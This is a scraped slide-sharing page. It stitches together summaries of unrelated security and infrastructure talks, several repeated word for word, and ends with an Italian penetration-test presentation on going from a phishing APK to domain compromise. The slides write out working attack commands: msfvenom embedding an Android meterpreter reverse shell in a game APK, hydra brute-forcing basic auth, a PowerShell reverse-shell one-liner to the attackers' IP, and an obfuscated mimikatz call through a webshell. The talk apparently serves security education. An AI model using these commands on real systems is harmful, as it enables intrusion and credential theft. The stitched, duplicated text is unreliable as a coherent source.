An attacker was able to gain access to an internal network by phishing a secretary's smartphone. They then used lateral movement techniques like pass-the-hash to escalate privileges and access sensitive files. This included obtaining Domain Admin credentials for the "adm.arazzi" user. The attacker was ultimately able to exfiltrate data and establish persistence on the network.
Apresentação na Pós-Graduação em Segurança da Informação:
- Sniffer de senhas em plain text;
- Ataque de brute-force no SSH;
- Proteção: Firewall, IPS e/ou TCP Wrappers;
- Segurança básica no sshd_config;
- Chaves RSA/DSA para acesso remoto;
- SSH buscando chaves no LDAP;
- Porque previnir o acesso: Fork Bomb
A massive attack was revealed that exploited the Shellshock vulnerability in QNAP NAS devices. The attackers deployed a payload that patched the vulnerability, armed the devices for DDOS attacks, and installed a scanner to search for more vulnerable devices. Over 500 compromised devices were detected. The payload installed a backdoor that could control the armed devices for DDOS attacks through IRC commands.
This document describes a swarm cluster with an overlay network containing multiple containers running various Docker services and images. The cluster has one container manager and three worker containers running the dind image. Services like HAProxy, a registry, nginx-proxy, and echo are distributed across the worker containers and load balanced with an overlay network for high availability.
This document summarizes various techniques for attacking SSH clients and servers by exploiting insecure configurations and options. It begins with an introduction explaining the goals of understanding practical attacks beyond typical secure configuration advice. It then covers attacks using X11 forwarding, disabling strict host key checking, agent forwarding, and stream local binding. Specific examples are provided for man-in-the-middle attacks using ARP spoofing, capturing credentials by impersonating SSH servers, and escalating privileges by reusing SSH agent sockets. The document aims to demonstrate real-world risks of deviating from default secure configurations.
This document provides an overview of advanced load balancing capabilities in Apache HTTP Server 2.2 using the mod_proxy module. Key points include:
- Mod_proxy allows Apache to function as a reverse proxy or load balancer for backend servers.
- New in 2.2 are improvements like large file support, graceful stop, mod_dbd integration, and better debugging.
- Load balancing is implemented through balancer providers that can be customized. Default providers balance by requests, traffic, or server busyness.
- Features like connection pooling, sticky sessions, failover clusters, and an embedded admin interface provide robust load balancing functionality.
Riak at The NYC Cloud Computing Meetup Groupsiculars
Riak is a distributed key-value store inspired by Dynamo. It is homogeneous, with a single key space and is distributed and replicated across nodes. Riak aims to provide predictable scalability and high availability while allowing for some flexibility in consistency versus availability tradeoffs. It uses a ring topology and vector clocks to manage data distribution and conflict resolution. Riak supports schemaless data storage and provides features like links for basic graph capabilities and map/reduce functions for querying data.
Apresentação na Pós-Graduação em Segurança da Informação:
- Sniffer de senhas em plain text;
- Ataque de brute-force no SSH;
- Proteção: Firewall, IPS e/ou TCP Wrappers;
- Segurança básica no sshd_config;
- Chaves RSA/DSA para acesso remoto;
- SSH buscando chaves no LDAP;
- Porque previnir o acesso: Fork Bomb
A massive attack was revealed that exploited the Shellshock vulnerability in QNAP NAS devices. The attackers deployed a payload that patched the vulnerability, armed the devices for DDOS attacks, and installed a scanner to search for more vulnerable devices. Over 500 compromised devices were detected. The payload installed a backdoor that could control the armed devices for DDOS attacks through IRC commands.
This document describes a swarm cluster with an overlay network containing multiple containers running various Docker services and images. The cluster has one container manager and three worker containers running the dind image. Services like HAProxy, a registry, nginx-proxy, and echo are distributed across the worker containers and load balanced with an overlay network for high availability.
This document summarizes various techniques for attacking SSH clients and servers by exploiting insecure configurations and options. It begins with an introduction explaining the goals of understanding practical attacks beyond typical secure configuration advice. It then covers attacks using X11 forwarding, disabling strict host key checking, agent forwarding, and stream local binding. Specific examples are provided for man-in-the-middle attacks using ARP spoofing, capturing credentials by impersonating SSH servers, and escalating privileges by reusing SSH agent sockets. The document aims to demonstrate real-world risks of deviating from default secure configurations.
This document provides an overview of advanced load balancing capabilities in Apache HTTP Server 2.2 using the mod_proxy module. Key points include:
- Mod_proxy allows Apache to function as a reverse proxy or load balancer for backend servers.
- New in 2.2 are improvements like large file support, graceful stop, mod_dbd integration, and better debugging.
- Load balancing is implemented through balancer providers that can be customized. Default providers balance by requests, traffic, or server busyness.
- Features like connection pooling, sticky sessions, failover clusters, and an embedded admin interface provide robust load balancing functionality.
Riak at The NYC Cloud Computing Meetup Groupsiculars
Riak is a distributed key-value store inspired by Dynamo. It is homogeneous, with a single key space and is distributed and replicated across nodes. Riak aims to provide predictable scalability and high availability while allowing for some flexibility in consistency versus availability tradeoffs. It uses a ring topology and vector clocks to manage data distribution and conflict resolution. Riak supports schemaless data storage and provides features like links for basic graph capabilities and map/reduce functions for querying data.
The document discusses best practices for securely implementing cryptography and discusses common cryptography algorithms and implementations such as hashing, symmetric encryption, asymmetric encryption, and password hashing. It emphasizes using proven implementations like those in Django and OpenSSL and enabling HTTPS to securely transmit data. The document also cautions that securely managing cryptographic keys is critical for encryption to provide security.
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNoSuchCon
Benjamin Delpy is a security researcher known for creating the tool mimikatz. Mimikatz can extract plaintext credentials and keys from memory. Kerberos authentication relies on encrypting tickets with various keys, including NTLM hashes and AES keys derived from the password. Mimikatz can perform pass-the-hash and over-pass-the-hash attacks by extracting these keys from memory and using them to authenticate.
This document summarizes password security concepts and provides code examples for implementing password hashing and salting. It discusses how storing passwords in plaintext is insecure and how hashing passwords with a salt adds security against dictionary attacks. The code example shows a MiniPasswordManager class that initially stored passwords in plaintext but is modified to hash passwords and add salts for increased security.
This document discusses Apache httpd reverse proxies and Tomcat. It covers why to use a proxy, common proxy protocols like AJP, HTTP/HTTPS, and HTTP/2. It also provides configuration examples for mod_jk, mod_proxy_ajp, and mod_proxy_http when using Apache httpd as a reverse proxy for Tomcat. Performance comparisons are shown between mod_jk, mod_proxy, and Nginx. The document concludes that a proxy is useful for load balancing, protocol upgrades, and SSL termination between the application server and internet.
Thinking of fuzzing applications on OS X can quickly lead to a passing conversation of "ooh exotic Mac stuff", "lets fuzz the kernel" or it can otherwise not be thought of as an exciting target, at least for looking for crashes in stuff other than Safari or the iPhone. While there are some intricacies and nuance involved, workaround for security protections to enable debugging and finding tools that work and work well, this research will detail how it can be done in a reliable way and make the topic more tangible and easier to digest, kind of like how people think about using AFL on Linux: it "just works". We'll explore some of the overlooked attack surface of file parsers and some network services on Mac, how to fuzz userland binaries and introduce a new fuzzer that makes setup and crash triage straightforward while poking at some Apple core apps and clients. Have you ever thought "This thing has got to have some bugs" but think twice because it's only on available on Mac and not worth the effort? If so, you may now find yourself both more motivated and better equipped to do some bug hunting on the sleek and eventually accommodating Mac OS.
This presentation, DEFEATING THE NETWORK SECURITY INFRASTRUCTURE v1.0.pdf, was made after some brainstorming
with some friends. The techniques used are not new and the tools readily available for download. The purpose of the discussion however
is to debate how internal enterprise resources might be (in)adversely exposed to the internet by in an insider using a combination of common techniques such as SSH and SSL.
TechEvent 2019: Wie sichere ich eigentlich Kafka ab?; Markus Bente - TrivadisTrivadis
The document discusses securing Apache Kafka. It covers:
1. Network security, host firewalls, and Linux user concepts can provide general security.
2. Zookeeper security includes SASL authentication between Zookeeper nodes and brokers, and authorization via access control lists (ACLs).
3. Kafka security includes encryption via SSL, SASL authentication like Kerberos or SCRAM, and authorization via ACLs managed in Zookeeper.
4. A demo shows generating certificates, configuring brokers and clients for SSL, and using ACLs to control access between principals.
The document provides an overview of a NodeJS CRUD and deployment course. The course outline includes: setting up a NodeJS environment on SmartOS with MySQL and Git in 3 minutes; tools for cloud development like SSH, SCP, and Git; building a simple web server with authorization using Passport and CRUD functionality with MySQL; and advanced topics like load balancing for cloud services. The course also provides a Micloud server for hands-on labs and sample projects.
The document discusses OWASP Zed Attack Proxy (ZAP), a free and open source web application security scanner. It can be used by pentesters, developers, and testers to detect vulnerabilities. ZAP passively and actively scans applications to find issues. It can be integrated into CI/CD pipelines and automated with APIs, command line tools, and programming libraries. The document provides examples of using ZAP to perform passive scanning, active scanning, and automation for testers.
The document discusses Kubernetes networking concepts including pods, services, and ingress. It provides examples of how containers within pods communicate via Docker networking. It also explains how Kubernetes networking solves the problems of pod-to-pod, service-to-pod, and external-to-service communications using services, iptables, and kube-proxy. The document demonstrates creating a deployment, service, and ingress to expose an application externally via a load balancer.
Fail2Ban is a tool that protects Linux servers from brute-force attacks. It monitors log files for signs of incorrect authentication attempts and bans IP addresses that show malicious signs. It works by updating firewall rules to reject IP addresses for a specified amount of time. The presentation covered installing and configuring Fail2Ban, testing banning policies for SSH and MySQL logins, and how to unban IP addresses.
Jim Jagielski discusses improvements to Apache HTTP Server 2.4 including enhanced performance, support for asynchronous I/O, additional multi-processing modules, and improved functionality for reverse proxy servers. Key enhancements to Apache's reverse proxy module mod_proxy include support for additional protocols like FastCGI and SCGI, improved load balancing capabilities, and an embedded administration interface.
This document provides an overview of Python cryptography and security topics including cryptography concepts like hashing, symmetric and asymmetric encryption, digital signatures, and Python libraries for working with cryptography like PyCrypto and Cryptography. It also discusses Django security best practices like using HTTPS, securing cookies and passwords, and access control.
SSHFP records provide a secure method of distributing host public keys via DNS. The document discusses:
1) How SSHFP records store fingerprints of host public keys in DNS to validate connections, rather than distributing keys directly.
2) The process of generating fingerprints from router public keys, creating SSHFP records, and configuring DNS to distribute them securely via DNSSEC.
3) How an SSH client can validate connections to a host by looking up its SSHFP records and fingerprints in DNS, preventing man-in-the-middle attacks.
SSHFP records provide a secure method of distributing host public keys via DNS. The document discusses:
1) How SSHFP records store the fingerprint of a host's public key in DNS, allowing clients to validate the key via DNS lookup rather than trusting the host directly.
2) Instructions for generating SSHFP records for network devices that may not support all SSH commands, including extracting public keys and generating fingerprints.
3) Configuration details for distributing the SSHFP records in DNS and validating them during SSH connections using DNSSEC, avoiding the need to manually accept host keys.
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
My presentation on how to use malware indicators of compromise to create rootcheck signatures for OSSEC. Explains different malware collection and analysis techniques.
Functional Operations (Functional Programming at Comcast Labs Connect)Susan Potter
Functional Operations: Packaging, system/configuration building, and testing infrastructure with [Nix] lambda
Maintaining configurations for different kinds of nodes and cloud resources in a [micro]service architecture can be an operational nightmare, especially if not managed with the application codebase. CI and CD job environments diverge from production configuration yielding their results unpredictable at best or produce false positives in the worst case. Code pushes to staging and production can have unintended consequences that can't be reasoned about before deploy and often can’t be inspected thoroughly on a dry run. Leading to unhappy users when problems do arise.
This session will demonstrate the use of the Nix and NixOS ecosystem to define and build packages in a referentially transparent way which can be leveraged as a solid foundation to configure systems and test multiple [virtual] machines with coordinated scenarios. We also look at how reliable packaging allows us to build a consistent CI/CD pipeline where upgrading your version of the JVM doesn't break your CI build servers for days.
The document provides an introduction to using DotCloud and Go. It discusses deploying a Perl application on DotCloud, including defining services in dotcloud.yml, connecting services to each other using environment variables, and pushing code to DotCloud. It also covers troubleshooting applications running on DotCloud using commands like dotcloud logs and dotcloud run.
Red Hat Forum Tokyo - OpenStack ArchitectureDan Radez
This was presented at the Red Hat Forum in Tokyo, November 2012. It's a basic getting started with OpenStack using RDO. It's the same as the OpenStack meetups presentation from November 2012
The document discusses best practices for securely implementing cryptography and discusses common cryptography algorithms and implementations such as hashing, symmetric encryption, asymmetric encryption, and password hashing. It emphasizes using proven implementations like those in Django and OpenSSL and enabling HTTPS to securely transmit data. The document also cautions that securely managing cryptographic keys is critical for encryption to provide security.
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNoSuchCon
Benjamin Delpy is a security researcher known for creating the tool mimikatz. Mimikatz can extract plaintext credentials and keys from memory. Kerberos authentication relies on encrypting tickets with various keys, including NTLM hashes and AES keys derived from the password. Mimikatz can perform pass-the-hash and over-pass-the-hash attacks by extracting these keys from memory and using them to authenticate.
This document summarizes password security concepts and provides code examples for implementing password hashing and salting. It discusses how storing passwords in plaintext is insecure and how hashing passwords with a salt adds security against dictionary attacks. The code example shows a MiniPasswordManager class that initially stored passwords in plaintext but is modified to hash passwords and add salts for increased security.
This document discusses Apache httpd reverse proxies and Tomcat. It covers why to use a proxy, common proxy protocols like AJP, HTTP/HTTPS, and HTTP/2. It also provides configuration examples for mod_jk, mod_proxy_ajp, and mod_proxy_http when using Apache httpd as a reverse proxy for Tomcat. Performance comparisons are shown between mod_jk, mod_proxy, and Nginx. The document concludes that a proxy is useful for load balancing, protocol upgrades, and SSL termination between the application server and internet.
Thinking of fuzzing applications on OS X can quickly lead to a passing conversation of "ooh exotic Mac stuff", "lets fuzz the kernel" or it can otherwise not be thought of as an exciting target, at least for looking for crashes in stuff other than Safari or the iPhone. While there are some intricacies and nuance involved, workaround for security protections to enable debugging and finding tools that work and work well, this research will detail how it can be done in a reliable way and make the topic more tangible and easier to digest, kind of like how people think about using AFL on Linux: it "just works". We'll explore some of the overlooked attack surface of file parsers and some network services on Mac, how to fuzz userland binaries and introduce a new fuzzer that makes setup and crash triage straightforward while poking at some Apple core apps and clients. Have you ever thought "This thing has got to have some bugs" but think twice because it's only on available on Mac and not worth the effort? If so, you may now find yourself both more motivated and better equipped to do some bug hunting on the sleek and eventually accommodating Mac OS.
This presentation, DEFEATING THE NETWORK SECURITY INFRASTRUCTURE v1.0.pdf, was made after some brainstorming
with some friends. The techniques used are not new and the tools readily available for download. The purpose of the discussion however
is to debate how internal enterprise resources might be (in)adversely exposed to the internet by in an insider using a combination of common techniques such as SSH and SSL.
TechEvent 2019: Wie sichere ich eigentlich Kafka ab?; Markus Bente - TrivadisTrivadis
The document discusses securing Apache Kafka. It covers:
1. Network security, host firewalls, and Linux user concepts can provide general security.
2. Zookeeper security includes SASL authentication between Zookeeper nodes and brokers, and authorization via access control lists (ACLs).
3. Kafka security includes encryption via SSL, SASL authentication like Kerberos or SCRAM, and authorization via ACLs managed in Zookeeper.
4. A demo shows generating certificates, configuring brokers and clients for SSL, and using ACLs to control access between principals.
The document provides an overview of a NodeJS CRUD and deployment course. The course outline includes: setting up a NodeJS environment on SmartOS with MySQL and Git in 3 minutes; tools for cloud development like SSH, SCP, and Git; building a simple web server with authorization using Passport and CRUD functionality with MySQL; and advanced topics like load balancing for cloud services. The course also provides a Micloud server for hands-on labs and sample projects.
The document discusses OWASP Zed Attack Proxy (ZAP), a free and open source web application security scanner. It can be used by pentesters, developers, and testers to detect vulnerabilities. ZAP passively and actively scans applications to find issues. It can be integrated into CI/CD pipelines and automated with APIs, command line tools, and programming libraries. The document provides examples of using ZAP to perform passive scanning, active scanning, and automation for testers.
The document discusses Kubernetes networking concepts including pods, services, and ingress. It provides examples of how containers within pods communicate via Docker networking. It also explains how Kubernetes networking solves the problems of pod-to-pod, service-to-pod, and external-to-service communications using services, iptables, and kube-proxy. The document demonstrates creating a deployment, service, and ingress to expose an application externally via a load balancer.
Fail2Ban is a tool that protects Linux servers from brute-force attacks. It monitors log files for signs of incorrect authentication attempts and bans IP addresses that show malicious signs. It works by updating firewall rules to reject IP addresses for a specified amount of time. The presentation covered installing and configuring Fail2Ban, testing banning policies for SSH and MySQL logins, and how to unban IP addresses.
Jim Jagielski discusses improvements to Apache HTTP Server 2.4 including enhanced performance, support for asynchronous I/O, additional multi-processing modules, and improved functionality for reverse proxy servers. Key enhancements to Apache's reverse proxy module mod_proxy include support for additional protocols like FastCGI and SCGI, improved load balancing capabilities, and an embedded administration interface.
This document provides an overview of Python cryptography and security topics including cryptography concepts like hashing, symmetric and asymmetric encryption, digital signatures, and Python libraries for working with cryptography like PyCrypto and Cryptography. It also discusses Django security best practices like using HTTPS, securing cookies and passwords, and access control.
SSHFP records provide a secure method of distributing host public keys via DNS. The document discusses:
1) How SSHFP records store fingerprints of host public keys in DNS to validate connections, rather than distributing keys directly.
2) The process of generating fingerprints from router public keys, creating SSHFP records, and configuring DNS to distribute them securely via DNSSEC.
3) How an SSH client can validate connections to a host by looking up its SSHFP records and fingerprints in DNS, preventing man-in-the-middle attacks.
SSHFP records provide a secure method of distributing host public keys via DNS. The document discusses:
1) How SSHFP records store the fingerprint of a host's public key in DNS, allowing clients to validate the key via DNS lookup rather than trusting the host directly.
2) Instructions for generating SSHFP records for network devices that may not support all SSH commands, including extracting public keys and generating fingerprints.
3) Configuration details for distributing the SSHFP records in DNS and validating them during SSH connections using DNSSEC, avoiding the need to manually accept host keys.
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
My presentation on how to use malware indicators of compromise to create rootcheck signatures for OSSEC. Explains different malware collection and analysis techniques.
Functional Operations (Functional Programming at Comcast Labs Connect)Susan Potter
Functional Operations: Packaging, system/configuration building, and testing infrastructure with [Nix] lambda
Maintaining configurations for different kinds of nodes and cloud resources in a [micro]service architecture can be an operational nightmare, especially if not managed with the application codebase. CI and CD job environments diverge from production configuration yielding their results unpredictable at best or produce false positives in the worst case. Code pushes to staging and production can have unintended consequences that can't be reasoned about before deploy and often can’t be inspected thoroughly on a dry run. Leading to unhappy users when problems do arise.
This session will demonstrate the use of the Nix and NixOS ecosystem to define and build packages in a referentially transparent way which can be leveraged as a solid foundation to configure systems and test multiple [virtual] machines with coordinated scenarios. We also look at how reliable packaging allows us to build a consistent CI/CD pipeline where upgrading your version of the JVM doesn't break your CI build servers for days.
The document provides an introduction to using DotCloud and Go. It discusses deploying a Perl application on DotCloud, including defining services in dotcloud.yml, connecting services to each other using environment variables, and pushing code to DotCloud. It also covers troubleshooting applications running on DotCloud using commands like dotcloud logs and dotcloud run.
Red Hat Forum Tokyo - OpenStack ArchitectureDan Radez
This was presented at the Red Hat Forum in Tokyo, November 2012. It's a basic getting started with OpenStack using RDO. It's the same as the OpenStack meetups presentation from November 2012
Swift Install Workshop - OpenStack Conference Spring 2012Joe Arnold
OpenStack Swift is a highly-available distributed object storage
system which supports highly concurrent workloads. Swift is the
backbone behind Cloud Files, Rackspace's storage-as-a-service
offering.
In this workshop, which will be hosted by members of SwiftStack, Inc.,
we'll walk you through deployment and use of OpenStack Swift. We'll
begin by showing you how to install Swift from the ground up.
You'll learn:
- what you should know about Swift's architecture
- how to bootstrap a basic Swift installation
After that, we'll cover how to use Swift, including information on:
- creating accounts and users
- adding, removing, and managing data
- building applications on top of Swift
Bring your laptop (with virutalization extensions enabled in the BIOS)
and we will walk through setting up Swift in a virtual machine. We'll
also build an entire application on top of Swift to illustrate how to
use Swift as a storage service. This is a workshop you won't want to
miss!
The document discusses using Python for ethical hacking and penetration testing. It provides reasons for using Python such as its ease of use, readable syntax, rich libraries, and existing tools. It then covers various Python libraries and frameworks used for tasks like reconnaissance, scanning, exploitation, and packet manipulation. Specific topics covered include file I/O, requests, sockets, scapy, and more.
The document discusses reverse engineering the firmware of Swisscom's Centro Grande modems. It identifies several vulnerabilities found, including a command overflow issue that allows complete control of the device by exceeding the input buffer, and multiple buffer overflow issues that can be exploited to execute code remotely by crafting specially formatted XML files. Details are provided on the exploitation techniques and timeline of coordination with Swisscom to address the vulnerabilities.
The document discusses using Docker and Docker Compose to run Python and Django applications. It shows commands for pulling Docker images, running containers, linking databases, mounting volumes, building images, and using Docker Compose to define and run multi-container applications. Key aspects covered include using Dockerfiles to build images, linking containers, mounting host directories as volumes, setting environment variables, and running commands on container startup.
NetDevOps Developer Environments with Vagrant @ SCALE16xHank Preston
From SCALE16X March 11, 2018
Add some serious developer cred to your approach to NetDevOps and network development by exploring how the OpenSource tool Vagrant can be used to quickly “up” networking platforms on your laptop for fast development, code testing, API exploration and more! In this session we’ll cover the basics of using Vagrant, focusing on the networking elements of managing interfaces, protocols, and automating the initial provisioning with another OpenSource tool, Ansible. Leave with everything you need to get started today!
Deploying Percona XtraDB Cluster in OpenshiftAlexander Rubin
This document discusses deploying and managing a Percona XtraDB Cluster (PXC) on OpenShift using the Percona-Lab/percona-openshift Helm chart. It includes steps to deploy the PXC cluster, Proxysql, services, and monitoring using PMM. Backup and restore options using Jobs are also mentioned.
Going from zero to Puppet by Pedro Pessoa, Operations Engineer at Server Density.
Abstract: Using out-of-the-box Puppet for non-sysadmin work - steps from going from no config management to managing 100 nodes and allowing non-sysadmin tasks to be performed.
Speaker Bio: Linux admin for 10+ years. Java/Python/C developer 12+ years. Ops engineer at http://www.serverdensity.com - a hosted server and website monitoring service. Currently processing 12TB+ per month into MongoDB running on dedicated and virtual instances.
www.serverdensity.com/puppetcamp/
fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)Wesley Beary
The document discusses how to use the Fog library to interact with cloud services. Fog allows interacting with multiple cloud providers like AWS, Rackspace, etc in a portable way. It provides models, collections, and methods to manage resources like servers, storage, DNS etc. in an abstracted way across providers. The document demonstrates how to boot a server, install SSH keys, run commands via SSH, and ping a target using the Fog and Ruby APIs in just a few lines of code.
This document discusses home automation and the r-house gem. It provides an overview of home automation categories like lighting, climate and appliances. It also summarizes the r-house architecture which includes components like the interceptor, devices, and database. Finally, it demonstrates how to initialize and connect the interceptor component and register events using the r-house gem.
fog or: How I Learned to Stop Worrying and Love the CloudWesley Beary
Learn how to easily get started on cloud computing with fog. If you can control your infrastructure choices, you’ll make better choices in development and get what you need in production. You'll get an overview of fog and concrete examples to give you a head start on your provisioning workflow.
This document discusses various techniques for advanced network forensics, including user/password cracking using Hydra, port scanning using Nmap, signature detection by analyzing file types in network payloads, and detecting converted file formats like MIME encoding. It provides examples of using tools like Hydra, Nmap, and Snort rules to detect activities like password cracking, port scanning, and the transmission of files like PDFs and images over the network.
Get hands-on with security features and best practices to protect your containerized services. Learn to push and verify signed images with Docker Content Trust, and collaborate with delegation roles. Intermediate to advanced level Docker experience recommended, participants will be building and pushing with Docker during the workshop.
Led By Docker Security Experts:
Riyaz Faizullabhoy
David Lawrence
Viktor Stanchev
Experience Level: Intermediate to advanced level Docker experience recommended
This document discusses PostgreSQL and Solaris as a low-cost platform for medium to large scale critical scenarios. It provides an overview of PostgreSQL, highlighting features like MVCC, PITR, and ACID compliance. It describes how Solaris and PostgreSQL integrate well, with benefits like DTrace support, scalability on multicore/multiprocessor systems, and Solaris Cluster support. Examples are given for installing PostgreSQL on Solaris using different methods, configuring zones for isolation, using ZFS for storage, and monitoring performance with DTrace scripts.
This document discusses the configuration of various server services, including:
- Setting up an Apache web server with SSL encryption and generating SSL certificates.
- Additional Apache configurations like virtual hosting, CGI scripts, and SELinux contexts.
- Basic SMTP configuration using Postfix and setting up an internal mail server.
- Configuring a caching-only DNS server using Named.
- Setting up NFS for file sharing between servers.
- Enabling file sharing with Windows clients using Samba (CIFS).
- Configuring an anonymous FTP server with vsftpd.
It provides instructions and examples for configuring each of these services on Linux servers.
This document discusses automating network configuration and operations using DevOps principles and tools like Puppet. It describes using Zero Touch Provisioning (ZTP) to automatically install and configure Puppet on new network devices. Puppet is then used to configure and manage interfaces, routing protocols, users, and other network settings through an infrastructure-as-code approach.
How I Learned to Stop Worrying and Love the Cloud - Wesley Beary, Engine YardSV Ruby on Rails Meetup
Wesley Beary: Cloud computing scared the crap out of me - the quirks and nightmares
of provisioning computing and storage on AWS, Terremark, Rackspace,
etc - until I took the bull by the horns. Let me now show you how I
tamed that bull.
Learn how to easily get started cloud computing with fog. It gives you
the reins within any Ruby application or script. If you can control
your infrastructure choices, you can make better choices in
development and get what you need in production.
You'll get an overview of fog and concrete examples to give you a head
start on your own provisioning workflow.
Nagios Conference 2013 - Leland Lammert - Nagios in a Multi-Platform EnviornmentNagios
Leland Lammert's presentation on Nagios in a Multi-Platform Enviornment.
The presentation was given during the Nagios World Conference North America held Sept 20-Oct 2nd, 2013 in Saint Paul, MN. For more information on the conference (including photos and videos), visit: http://go.nagios.com/nwcna
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC
Ellisha Heppner, Grant Management Lead, presented an update on APNIC Foundation to the PNG DNS Forum held from 6 to 10 May, 2024 in Port Moresby, Papua New Guinea.
Gen Z and the marketplaces - let's translate their needsLaura Szabó
The product workshop focused on exploring the requirements of Generation Z in relation to marketplace dynamics. We delved into their specific needs, examined the specifics in their shopping preferences, and analyzed their preferred methods for accessing information and making purchases within a marketplace. Through the study of real-life cases , we tried to gain valuable insights into enhancing the marketplace experience for Generation Z.
The workshop was held on the DMA Conference in Vienna June 2024.
Understanding User Behavior with Google Analytics.pdfSEO Article Boost
Unlocking the full potential of Google Analytics is crucial for understanding and optimizing your website’s performance. This guide dives deep into the essential aspects of Google Analytics, from analyzing traffic sources to understanding user demographics and tracking user engagement.
Traffic Sources Analysis:
Discover where your website traffic originates. By examining the Acquisition section, you can identify whether visitors come from organic search, paid campaigns, direct visits, social media, or referral links. This knowledge helps in refining marketing strategies and optimizing resource allocation.
User Demographics Insights:
Gain a comprehensive view of your audience by exploring demographic data in the Audience section. Understand age, gender, and interests to tailor your marketing strategies effectively. Leverage this information to create personalized content and improve user engagement and conversion rates.
Tracking User Engagement:
Learn how to measure user interaction with your site through key metrics like bounce rate, average session duration, and pages per session. Enhance user experience by analyzing engagement metrics and implementing strategies to keep visitors engaged.
Conversion Rate Optimization:
Understand the importance of conversion rates and how to track them using Google Analytics. Set up Goals, analyze conversion funnels, segment your audience, and employ A/B testing to optimize your website for higher conversions. Utilize ecommerce tracking and multi-channel funnels for a detailed view of your sales performance and marketing channel contributions.
Custom Reports and Dashboards:
Create custom reports and dashboards to visualize and interpret data relevant to your business goals. Use advanced filters, segments, and visualization options to gain deeper insights. Incorporate custom dimensions and metrics for tailored data analysis. Integrate external data sources to enrich your analytics and make well-informed decisions.
This guide is designed to help you harness the power of Google Analytics for making data-driven decisions that enhance website performance and achieve your digital marketing objectives. Whether you are looking to improve SEO, refine your social media strategy, or boost conversion rates, understanding and utilizing Google Analytics is essential for your success.
Instagram has become one of the most popular social media platforms, allowing people to share photos, videos, and stories with their followers. Sometimes, though, you might want to view someone's story without them knowing.
Ready to Unlock the Power of Blockchain!Toptal Tech
Imagine a world where data flows freely, yet remains secure. A world where trust is built into the fabric of every transaction. This is the promise of blockchain, a revolutionary technology poised to reshape our digital landscape.
Toptal Tech is at the forefront of this innovation, connecting you with the brightest minds in blockchain development. Together, we can unlock the potential of this transformative technology, building a future of transparency, security, and endless possibilities.
1. Da APK al Golden Ticket
Storia di un penetration test
Andrea Pierini, Giuseppe Trotta
2. Chi siamo
➔ Andrea Pierini: IT Architect & Security Manager, con la passione del
pentesting - il vecchio saggio
➔ Giuseppe Trotta: Penetration tester - il figliol prodigo
5. ➔ Background
➔ Da APK a shell sul server WSUS
➔ Lateral Movement(s) & Exploitation
➔ Exfiltration
➔ Golden Ticket
➔ Persistenza
Agenda
6. Storia di un pentest
Partendo da una campagna di phishing, dopo aver effettuato spear phishing
sulla segretaria e sul suo smartphone, ci siamo intrufolati nella rete
aziendale e, attraverso “movimenti laterali” e “privilege escalation”, siamo
diventati amministratori del dominio, abbiamo sottratto file sensibili e attuato
tecniche di persistence
10. Background
➔ Durante i colloqui preliminari, abbiamo chiesto
accesso al Wi-Fi “GUEST”.
➔ Credenziali valide per 1 giorno
➔ Tanti dispositivi collegati … i dipendenti?
12. ➔ … il suo smartphone e la figlia ...
Phishing campaign
$ msfvenom -x puzzle.apk
-p android/meterpreter/reverse_tcp
LHOST=<IL_NOSTRO_IP> LPORT=443 -o /var/www/html/puzzle.apk
17. Il server intranet
➔ Portforwarding
➔ Apache basic-auth bruteforce
meterpreter>portfwd add -L 127.0.0.1 -l 8001 -r 192.168.178.195 -p 80
meterpreter>portfwd add -L 127.0.0.1 -l 8002 -r 192.168.178.195 -p 8080
# hydra 127.0.0.1 -s 8002 -L users.txt -P pass.txt -t12 http-get /
…
[DATA] max 12 tasks per 1 server, overall 64 tasks, 11000 login tries
(l:11/p:1000), ~14 tries per task
[DATA] attacking service http-get on port 8080
…
[8080][http-get] host: 127.0.0.1 login: admin password:
password123456
1 of 1 target successfully completed, 1 valid password found
18. Caro Tomcat…
➔ Upload file WAR file (Web-application ARchive):
◆ cmd.jsp
◆ Mimikatz (PS) “offuscato”
19. `Obf`u`s`c""a'tio'"$([char]0x6E)"
➔ Meccanismi di detection molto scarsi
➔ Match di stringhe/comandi
➔ Linguaggio flessibile
➔ RTFM funziona sempre…
➔ Invoke-Obfuscation by Daniel Bohannon
^must read
21. Dovevamo far presto…
Command: cmd /c set
ALLUSERSPROFILE=C:ProgramData
...
COMPUTERNAME=SRVINTRANET
...
USERDOMAIN=SUPERCOMPANY
USERNAME=SRVINTRANET$
Command: cmd /c systeminfo
Host Name: SRVINTRANET
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
…
System Manufacturer: VMware, Inc.
…
22. Dovevamo far presto…
Command: cmd /c nltest /dclist:supercompany
Get list of DCs in domain 'supercompany' from 'SRVDC1'.
srvdc1.supercompany.local[PDC] [DS]Site: Default-First-Site-Name
srvdc2.supercompany.local [DS]Site: Default-First-Site-Name
...
The command completed successfully
Command: cmd /c dir "c:program files (x86)"
Volume in drive C has no label.
Volume Serial Number is C050-5A8D
Directory of c:program files (x86)
02/25/2017 08:59 AM <DIR> .
02/25/2017 08:59 AM <DIR> ..
...
02/25/2017 08:59 AM <DIR> Symantec
...
23. ➔ Dalla webshell avevamo provato a lanciare una Reverse Shell (PS)
➔ Nulla di fatto!
➔ Evidentemente SRVINTRANET non aveva accesso a internet
Reverse shell #1
Command: cmd /c powershell -nop -c
"$client=New-Object System.Net.Sockets.TCPClient('IL_NOSTRO_IP',443);
$stream=$client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback=(iex $data 2>&1 | Out-String );$sendback2=$sendback+'PS '+(pwd).Path + '> ';
$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()
};$client.Close()"
24. Piano B: reperire le credenziali
➔ Mimigatto, PrendiCroccantini!
Command: cmd /c powershell -nop -exec bypass -command "import-module
c:tomcatwebappscmdwarfilesmimigatto.ps1;
ChiamaIlGatto -PrendiCroccantini"
